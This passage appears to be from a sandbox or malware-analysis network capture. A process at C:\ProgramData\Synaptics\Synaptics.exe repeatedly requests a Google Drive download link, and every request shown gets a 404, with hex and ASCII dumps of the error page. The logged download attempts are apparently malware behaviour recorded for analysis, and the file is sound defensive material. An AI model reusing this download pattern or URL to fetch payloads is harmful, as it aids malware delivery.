                                                                                                                                                                                        Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="VegVNvZhCPoVQC21sm5hzA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
                                                                                                                                                                                        2022-05-17 11:31:33 UTC102INData Raw: 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20
                                                                                                                                                                                        Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not
                                                                                                                                                                                        2022-05-17 11:31:33 UTC102INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        34192.168.2.349780142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:33 UTC99OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:33 UTC102INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:33 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-51QqysDPh/PhygcPA6/S8Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:33 UTC103INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta ch
                                                                                                                                                                                        2022-05-17 11:31:33 UTC103INData Raw: 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 48 38 79 77 69 30 55 4b 37 68 32 2b 4c 4e 52 2b 34 70 2b 34 32 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66
                                                                                                                                                                                        Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="H8ywi0UK7h2+LNR+4p+42A">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
                                                                                                                                                                                        2022-05-17 11:31:33 UTC105INData Raw: 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20
                                                                                                                                                                                        Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not
                                                                                                                                                                                        2022-05-17 11:31:33 UTC105INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        35192.168.2.349781142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:33 UTC102OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:33 UTC105INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:33 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-/+GbJQH5LxI6sJDI4koQ/w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:33 UTC107INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 34 2f 4d 6d 76 75 2f 38 58 2b 74 70 38 50 74 49 37 66 32 37 65 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="4/Mmvu/8X+tp8PtI7f27eA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
                                                                                                                                                                                        2022-05-17 11:31:33 UTC108INData Raw: 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e 0d 0a
                                                                                                                                                                                        Data Ascii: l=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>
                                                                                                                                                                                        2022-05-17 11:31:33 UTC108INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        36192.168.2.349783142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:33 UTC105OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:33 UTC108INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:33 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-w2V4LS8zE6emGsfYDbDhxg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"
                                                                                                                                                                                        Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:33 UTC110INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 70 73 43 72 4d 32 6f 6f 62 55 69 57 70 65 70 36 42 6c 70 64 7a 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="psCrM2oobUiWpep6BlpdzQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
                                                                                                                                                                                        2022-05-17 11:31:33 UTC111INData Raw: 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e 0d 0a
                                                                                                                                                                                        Data Ascii: l=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>
                                                                                                                                                                                        2022-05-17 11:31:33 UTC111INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        37192.168.2.349784142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:33 UTC108OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:34 UTC111INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:33 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-Cyl1qu7cmTXwT6K4SpenNA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:34 UTC113INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta ch
                                                                                                                                                                                        2022-05-17 11:31:34 UTC113INData Raw: 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 38 6c 32 6c 74 45 79 35 55 71 5a 37 61 33 4e 46 54 75 42 78 70 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66
                                                                                                                                                                                        Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="8l2ltEy5UqZ7a3NFTuBxpg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
                                                                                                                                                                                        2022-05-17 11:31:34 UTC114INData Raw: 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20
                                                                                                                                                                                        Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not
                                                                                                                                                                                        2022-05-17 11:31:34 UTC114INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        38192.168.2.349785142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:34 UTC114OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:34 UTC115INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:34 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-DWMVWok7zBaOQXOWKmUfJA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:34 UTC116INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta ch
                                                                                                                                                                                        2022-05-17 11:31:34 UTC116INData Raw: 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 2b 32 66 43 74 70 63 76 30 2b 30 52 38 64 32 6c 2b 77 2f 48 35 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66
                                                                                                                                                                                        Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="+2fCtpcv0+0R8d2l+w/H5g">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
